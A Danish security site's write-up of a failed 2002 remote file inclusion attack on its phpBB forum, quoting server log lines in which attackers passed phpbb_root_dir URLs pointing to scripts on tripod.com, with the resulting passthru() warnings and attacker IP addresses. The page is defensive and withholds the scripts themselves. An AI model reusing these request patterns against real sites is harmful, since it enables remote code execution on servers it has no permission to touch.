Forside

  Antivirus

  Firewall

  Spam

  Spyware

DOWNLOAD GRATIS SPAM PROGRAM

STREAMER
T-SHIRTS

INDHOLD

  Forside

  Artikler

  Guides

  Nyheder

  Support

  Logfiler

  Tools

  Download

  Litteratur

  Hacker Games

  Hardware firewalls

  Software firewalls

  Gratis WLAN Guide

  Software

ANBEFALING:

INFORMATION SECURITY MANAGEMENT HANDBOOK

 

ONLINE VIRUSSCAN

Gratis online viruscanner 

LOGFILER 

Logfiler:

Linux hack
PHP attack mod ghost-recon.nu
PHP attack mod Kriminalitet.dk
Formmail attack mod Kriminalitet.dk
PHP attack mod DK-Force.dk

Exploit mod Kriminalitet.dk
UNIX og Nimda
ISA og Code Red

Logfiler: PHP attack mod Kriminalitet.dk  

En gruppe fra Brasilien har forsøgt at hacke kriminalitet.dk´s support forum. Det er ikke lykkedes for dem, og her er en beskrivelse af forløbet.
Det startede klokken 03:58:55 med det første anslag og siden da har der været adskillige forsøg.

Fælles for dem alle er at man via et php script på en website hos webhotel udbyderen Tripod.com forsøger at hente passwords og lignende.

IP adressen der står bag et de mange forsøg er 200.165.47.137, der ved opslag med whois viser at være tilhørende Latin American and Caribbean IP address Regional Registry.

En af de websites der bruges hos tripod kan ses her: http://b1s0n.tripod.com
Ved gennemgang af logfilerne var der blandt andet disse linier:

Error-loggen viser at der er en PHP Warning men hvilken IP adresse det er ses ikke:

[Sun Dec 15 03:58:55 2002] [error] PHP Warning: passthru() has been disabled for security reasons in http://plinxipi.tripod.com/[script der blev brugt].php on line 1

[Sun Dec 15 05:53:59 2002] [error] PHP Warning: passthru() has been disabled for security reasons in http://b1s0n.tripod.com/[script der blev brugt].php on line 1

[Sun Dec 15 05:53:59 2002] [error] PHP Warning: passthru() has been disabled for security reasons in http://b1s0n.tripod.com/[script der blev brugt].php on line 3

Access-loggen viser hvilke IP adresser der står bag:

200.163.95.240 - - [15/Dec/2002:03:58:55 +0100] "GET /phpBB2/install.php?phpbb_root_dir=http://plinxipi.tripod.com/ HTTP/1.1" 179 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"

200.163.95.240 - - [15/Dec/2002:03:59:03 +0100] "GET /phpBB2/index.php?sid=6162b0f0841941b587422d053e48f7f5 HTTP/1.1" 31621 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"

200.174.3.164 - - [15/Dec/2002:05:53:59 +0100] "GET /phpBB2/install.php?phpbb_root_dir=http://b1s0n.tripod.com/ HTTP/1.0" 633 "-" "-"

200.165.47.137 - - [16/Dec/2002:16:11:37 +0100] "GET /phpBB2/install.php?phpbb_root_dir=http://5ec0.tripod.com/ HTTP/1.1" 174 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"

Indholdet at de php scripts der blev brugt er ikke vist her, det er for ikke at friste andre til at begå dumheder.

En whois på de enkelte IP adresser viser at de tilhører Brasilianske internet brugere.

Dette er et godt eksempel på hvor vigtigt det er at man har styr over sine logfiler.

Copyright © KRIMINALITET.DK